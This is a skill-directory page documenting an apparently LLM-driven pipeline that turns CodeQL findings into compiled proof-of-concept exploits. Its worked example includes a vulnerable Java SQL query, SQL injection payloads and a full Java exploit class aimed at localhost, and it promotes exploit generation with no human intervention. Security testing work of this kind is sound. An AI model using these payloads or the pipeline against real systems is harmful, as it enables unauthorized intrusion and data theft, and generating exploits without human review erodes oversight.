Back to skills
SKILL.md
873 Phase2 Overview A828cf5e
ASecurityThis document explains the fully autonomous CodeQL analysis workflow implemented in Phase 2.
- 9 stars
- 0 votes
- 0 copies
- 0 views
- Added October 11, 2026
Works with
Security analysis
100/100npx -y skills add tools-only/X-Skills --skill 873-phase2_overview_a828cf5e --agent claude-codeAre you the author of 873 Phase2 Overview A828cf5e?
Add the live security badge to your README. It updates with every re-scan.
[](https://www.skillsdirectory.com/skills/tools-only-873-phase2-overview-a828cf5e)# Phase 2: Autonomous Vulnerability Analysis - Overview
This document explains the fully autonomous CodeQL analysis workflow implemented in Phase 2.
## π― What Phase 2 Does
Phase 2 takes the SARIF output from Phase 1 (CodeQL scanning) and performs **fully autonomous vulnerability analysis**:
1. **Dataflow Validation** - LLM validates if dataflow paths are truly exploitable
2. **Deep Vulnerability Analysis** - Multi-turn dialogue for thorough assessment
3. **PoC Exploit Generation** - Automatically creates working exploits
4. **Exploit Validation** - Compiles and validates generated exploits
5. **Iterative Refinement** - Auto-fixes compilation errors
## π Complete Workflow
```
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β PHASE 1: CodeQL Scanning β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β 1. Auto-detect languages β
β 2. Auto-detect build systems β
β 3. Create CodeQL databases (cached) β
β 4. Run security suites β
β 5. Generate SARIF output β
ββββββββββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββββββ
β SARIF files
βΌ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β PHASE 2: Autonomous Analysis β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β For each finding in SARIF: β
β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β 1. Parse Finding β β
β β - Extract rule, location, code snippet β β
β β - Identify CWE β β
β β - Check for dataflow paths β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β β
β βΌ β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β 2. Read Vulnerable Code β β
β β - Load source file β β
β β - Extract context (50 lines before/after) β β
β β - Identify function/class context β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β β
β βΌ β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β 3. Dataflow Validation (if applicable) β β
β β ββββββββββββββββββββββββββββββββββββββββββββββββββββ β β
β β β DataflowValidator β β β
β β β - Extract source, sink, intermediate steps β β β
β β β - Identify sanitizers in path β β β
β β β - LLM analyzes: β β β
β β β β’ Can sanitizers be bypassed? β β β
β β β β’ Are there hidden barriers? β β β
β β β β’ Is path reachable at runtime? β β β
β β β β’ What's the attack complexity? β β β
β β ββββββββββββββββββββββββββββββββββββββββββββββββββββ β β
β β β β
β β Result: DataflowValidation β β
β β - is_exploitable: bool β β
β β - confidence: 0.0-1.0 β β
β β - bypass_strategy: string β β
β β - attack_complexity: low/medium/high β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β β
β If not exploitable, STOP β
β β β
β βΌ β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β 4. Deep Vulnerability Analysis β β
β β ββββββββββββββββββββββββββββββββββββββββββββββββββββ β β
β β β LLM Analysis (with optional multi-turn) β β β
β β β - Is this a true positive? β β β
β β β - Is it exploitable? β β β
β β β - Exploitability score (0.0-1.0) β β β
β β β - Attack scenario (step-by-step) β β β
β β β - Prerequisites for exploitation β β β
β β β - Impact assessment β β β
β β β - CVSS estimate β β β
β β β - Mitigation recommendations β β β
β β ββββββββββββββββββββββββββββββββββββββββββββββββββββ β β
β β β β
β β Result: VulnerabilityAnalysis β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β β
β If not exploitable, STOP β
β β β
β βΌ β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β 5. PoC Exploit Generation β β
β β ββββββββββββββββββββββββββββββββββββββββββββββββββββ β β
β β β LLM Exploit Generator β β β
β β β - Uses Mark Dowd persona (expert) β β β
β β β - Temperature: 0.8 (creative) β β β
β β β - Includes full context: β β β
β β β β’ Vulnerable code β β β
β β β β’ Analysis reasoning β β β
β β β β’ Attack scenario β β β
β β β β’ Prerequisites β β β
β β β - Generates working exploit code β β β
β β β - Language-appropriate (Java/Python/etc.) β β β
β β ββββββββββββββββββββββββββββββββββββββββββββββββββββ β β
β β β β
β β Output: Complete exploit source code β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β β
β βΌ β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β 6. Exploit Validation & Refinement β β
β β ββββββββββββββββββββββββββββββββββββββββββββββββββββ β β
β β β ExploitValidator (from RAPTOR autonomous/) β β β
β β β - Attempt compilation (gcc/javac/etc.) β β β
β β β - Extract compilation errors β β β
β β β - If failed: β β β
β β β βββββββββββββββββββββββββββββββββββββββ β β β
β β β β Iterative Refinement (up to 3x) β β β β
β β β β - Pass errors back to LLM β β β β
β β β β - LLM fixes the code β β β β
β β β β - Retry compilation β β β β
β β β βββββββββββββββββββββββββββββββββββββββ β β β
β β ββββββββββββββββββββββββββββββββββββββββββββββββββββ β β
β β β β
β β Result: ValidationResult β β
β β - success: bool β β
β β - exploit_path: Path (if compiled) β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β β
β βΌ β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β 7. Save Artifacts β β
β β - analysis/{rule_id}_{line}_analysis.json β β
β β - exploits/{rule_id}_{line}_exploit.{java|py} β β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β
βββββββββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββββββββ
β
βΌ
Final Summary Report
```
## π Key Components
### 1. DataflowValidator (`dataflow_validator.py`)
**Purpose**: Validates CodeQL dataflow findings beyond static analysis.
**Capabilities**:
- Extracts source β sink paths from SARIF
- Identifies intermediate steps and sanitizers
- LLM analyzes:
- Sanitizer effectiveness
- Bypass strategies
- Hidden barriers
- Runtime reachability
- Attack complexity
**Example Prompt**:
```
You are analyzing a dataflow path:
SOURCE: User input from HTTP parameter
LoginController.java:45
STEP 1: Passes through validation
InputValidator.java:23
SINK: SQL query execution
UserDAO.java:78
SANITIZERS: Basic input validation
Determine:
1. Can the sanitizer be bypassed?
2. Is this truly exploitable?
3. What's the attack complexity?
```
**Output**:
```json
{
"is_exploitable": true,
"confidence": 0.85,
"sanitizers_effective": false,
"bypass_possible": true,
"bypass_strategy": "Use SQL comment syntax to bypass length check",
"attack_complexity": "medium",
"reasoning": "The input validator only checks length, not content...",
"barriers": ["Length limit of 100 chars"],
"prerequisites": ["Valid user account", "Access to login form"]
}
```
### 2. AutonomousCodeQLAnalyzer (`autonomous_analyzer.py`)
**Purpose**: Orchestrates complete autonomous analysis pipeline.
**Integrations**:
- **LLM Client** (`packages/llm_analysis/llm/client.py`) - Multi-provider LLM support
- **ExploitValidator** (`packages/autonomous/exploit_validator.py`) - Compilation validation
- **MultiTurnAnalyser** (`packages/autonomous/dialogue.py`) - Deep iterative analysis
**Analysis Pipeline**:
```python
def analyze_finding_autonomous(self, sarif_result, repo_path, out_dir):
# 1. Parse finding from SARIF
finding = self.parse_sarif_finding(sarif_result)
# 2. Read vulnerable code with context
code = self.read_vulnerable_code(finding, repo_path)
# 3. Validate dataflow (if applicable)
if finding.has_dataflow:
dataflow = self.dataflow_validator.validate_finding(sarif_result)
if not dataflow.is_exploitable:
return # Stop if dataflow blocked
# 4. Deep LLM analysis
analysis = self.analyze_vulnerability(finding, code, dataflow)
if not analysis.is_exploitable:
return # Stop if not exploitable
# 5. Generate PoC exploit
exploit = self.generate_exploit(finding, analysis, code)
# 6. Validate & refine exploit
validation = self.validator.validate_exploit(exploit)
while not validation.success and iterations < 3:
exploit = self.refine_exploit(exploit, validation.errors)
validation = self.validator.validate_exploit(exploit)
# 7. Save artifacts
save_analysis(finding, analysis, dataflow)
save_exploit(exploit)
```
### 3. Complete Workflow (`raptor_codeql.py`)
**Purpose**: End-to-end autonomous security testing.
**Usage**:
```bash
# Fully autonomous (zero configuration)
python3 raptor_codeql.py --repo /path/to/code
# What happens:
# Phase 1: CodeQL scanning (5-30 min)
# - Auto-detect Java
# - Create database
# - Run security suite
# - Output: 23 findings in SARIF
#
# Phase 2: Autonomous analysis (10-60 min)
# - Analyze 20 findings (max-findings default)
# - 12 found exploitable
# - 10 exploits generated
# - 8 exploits compiled successfully
```
## π‘ Example: SQL Injection Finding
Let's walk through a real example:
### Input (from SARIF):
```json
{
"ruleId": "java/sql-injection",
"level": "error",
"message": {
"text": "Query built from user-controlled source"
},
"locations": [{
"physicalLocation": {
"artifactLocation": {"uri": "src/main/java/UserDAO.java"},
"region": {"startLine": 78}
}
}],
"codeFlows": [
{
"threadFlows": [{
"locations": [
{"location": {"message": {"text": "source: request parameter"}}},
{"location": {"message": {"text": "step: String concatenation"}}},
{"location": {"message": {"text": "sink: executeQuery"}}}
]
}]
}
]
}
```
### Phase 2 Processing:
**Step 1: Parse Finding**
```python
finding = CodeQLFinding(
rule_id="java/sql-injection",
rule_name="SQL Injection",
cwe="CWE-89",
file_path="src/main/java/UserDAO.java",
start_line=78,
has_dataflow=True
)
```
**Step 2: Read Code**
```java
// UserDAO.java around line 78
public User getUserByUsername(String username) {
String query = "SELECT * FROM users WHERE username = '"
+ username + "'"; // β VULNERABLE LINE 78
try {
ResultSet rs = stmt.executeQuery(query);
// ...
}
}
```
**Step 3: Dataflow Validation**
```
LLM Prompt:
"Analyze this dataflow path from HTTP parameter to SQL query.
The input passes through basic validation but uses string concatenation..."
LLM Response:
{
"is_exploitable": true,
"confidence": 0.95,
"bypass_possible": true,
"bypass_strategy": "Input ' OR '1'='1 to bypass WHERE clause",
"attack_complexity": "low"
}
```
**Step 4: Vulnerability Analysis**
```
LLM Prompt:
"Is this SQL injection truly exploitable?..."
LLM Response:
{
"is_exploitable": true,
"exploitability_score": 0.9,
"attack_scenario": "1. Access /users?username=admin' OR '1'='1...",
"cvss_estimate": 8.5,
"mitigation": "Use PreparedStatement with parameterized queries"
}
```
**Step 5: Exploit Generation**
```
LLM Prompt (Mark Dowd persona):
"Create a working SQL injection exploit for this vulnerability..."
LLM Response:
```java
/**
* SQL Injection PoC for UserDAO.getUserByUsername()
*
* WARNING: For authorized testing only!
*/
public class SqlInjectionExploit {
public static void main(String[] args) throws Exception {
String targetUrl = "http://localhost:8080/users";
// Payload: bypass authentication
String payload = "admin' OR '1'='1' --";
URL url = new URL(targetUrl + "?username=" + URLEncoder.encode(payload));
HttpURLConnection conn = (HttpURLConnection) url.openConnection();
int responseCode = conn.getResponseCode();
System.out.println("Response code: " + responseCode);
// Read response
BufferedReader in = new BufferedReader(
new InputStreamReader(conn.getInputStream()));
String line;
while ((line = in.readLine()) != null) {
System.out.println(line);
}
in.close();
System.out.println("\nβ SQL Injection successful!");
System.out.println("Payload: " + payload);
}
}
```
**Step 6: Validation**
```bash
# ExploitValidator attempts compilation
$ javac SqlInjectionExploit.java
β Compilation successful
Result:
{
"success": true,
"exploit_path": "exploits/java-sql-injection_78_exploit.java"
}
```
### Final Output:
**Directory Structure**:
```
out/codeql_acme-access_20251114_123456/
βββ codeql_java.sarif # Phase 1
βββ autonomous/
β βββ analysis/
β β βββ java-sql-injection_78_analysis.json # Phase 2
β βββ exploits/
β βββ java-sql-injection_78_exploit.java # Phase 2 β Compiled
βββ autonomous_summary.json
```
**Analysis JSON** (`java-sql-injection_78_analysis.json`):
```json
{
"finding": {
"rule_id": "java/sql-injection",
"cwe": "CWE-89",
"file_path": "src/main/java/UserDAO.java",
"start_line": 78
},
"analysis": {
"is_exploitable": true,
"exploitability_score": 0.9,
"severity_assessment": "Critical",
"attack_scenario": "...",
"cvss_estimate": 8.5,
"mitigation": "Use PreparedStatement..."
},
"dataflow_validation": {
"is_exploitable": true,
"confidence": 0.95,
"bypass_strategy": "Input ' OR '1'='1..."
}
}
```
## π― Integration with Existing RAPTOR
Phase 2 seamlessly integrates with RAPTOR's existing autonomous system:
- **LLM Client** (`packages/llm_analysis/llm/client.py`)
- Multi-provider support (Claude, GPT-4, Ollama)
- Automatic fallback
- Cost tracking
- Response caching
- **Exploit Validator** (`packages/autonomous/exploit_validator.py`)
- Compilation validation
- Error extraction
- Iterative refinement
- **Multi-Turn Analyzer** (`packages/autonomous/dialogue.py`)
- Deep iterative reasoning
- Confidence scoring
- Convergence detection
- **Existing Patterns**
- VulnerabilityContext β CodeQLFinding
- Same LLM prompts philosophy
- Same output structure
## π Usage Examples
### Basic Usage:
```bash
# Fully autonomous - everything automatic
python3 raptor_codeql.py --repo /path/to/code
# Output:
# Phase 1: 23 findings
# Phase 2: 12 exploitable, 10 exploits, 8 compiled
```
### Scan Only (Phase 1 only):
```bash
# Just scanning, no LLM analysis
python3 raptor_codeql.py --repo /path/to/code --scan-only
```
### Custom Settings:
```bash
# Analyze up to 50 findings
export ANTHROPIC_API_KEY=sk-...
python3 raptor_codeql.py \
--repo /path/to/code \
--languages java \
--max-findings 50
```
### Output Structure:
```
out/codeql_<repo>_<timestamp>/
βββ codeql_java.sarif # Phase 1: CodeQL results
βββ autonomous/ # Phase 2: Autonomous analysis
β βββ analysis/ # Detailed analysis per finding
β β βββ {rule}_{line}_analysis.json
β β βββ ...
β βββ exploits/ # Generated exploits
β βββ {rule}_{line}_exploit.java
β βββ ...
βββ codeql_report.json # Phase 1 summary
βββ autonomous_summary.json # Phase 2 summary
```
## π Performance
- **Phase 1 (Scanning)**: 5-30 minutes
- Database creation (cached after first run)
- Query execution
- **Phase 2 (Autonomous Analysis)**: 10-60 minutes
- Depends on:
- Number of findings
- LLM provider speed
- Exploit compilation time
- Parallelizable (future enhancement)
**Typical Timeline**:
```
00:00 - Start
00:05 - Database created (or cached)
00:08 - Security suite complete (23 findings)
00:10 - Begin autonomous analysis
00:15 - Finding 1-5 analyzed
00:25 - Finding 6-10 analyzed
00:35 - Finding 11-15 analyzed
00:45 - Finding 16-20 analyzed
00:50 - Exploit validation complete
00:50 - Done!
```
## π Key Advantages
1. **Zero Configuration** - Works out of the box
2. **Fully Autonomous** - No human intervention needed
3. **Deep Analysis** - Goes beyond static detection
4. **Validated Exploits** - Actually compiles PoCs
5. **Iterative Refinement** - Fixes its own errors
6. **Seamless Integration** - Uses existing RAPTOR components
7. **Comprehensive Output** - SARIF + Analysis + Exploits
## π§ Requirements
- **CodeQL** - Installed and in PATH (or use --codeql-cli)
- **LLM Provider** - One of:
- Anthropic API key (Claude) - Recommended
- OpenAI API key (GPT-4)
- Ollama running locally (free!)
- **Compilers** (for exploit validation):
- Java: `javac`
- C/C++: `gcc`
- Python: built-in
## π Next Steps
Want to try it? Just run:
```bash
# Set your API key
export ANTHROPIC_API_KEY=sk-...
# Run fully autonomous workflow
python3 raptor_codeql.py --repo /path/to/your/java/project
# Wait 20-60 minutes
# Review exploits in out/codeql_*/autonomous/exploits/
```
Daniel, this is what Phase 2 looks like! Ready to test it on your Java project once the CodeQL analysis finishes? π
Attribution
Comments
Loading commentsβ¦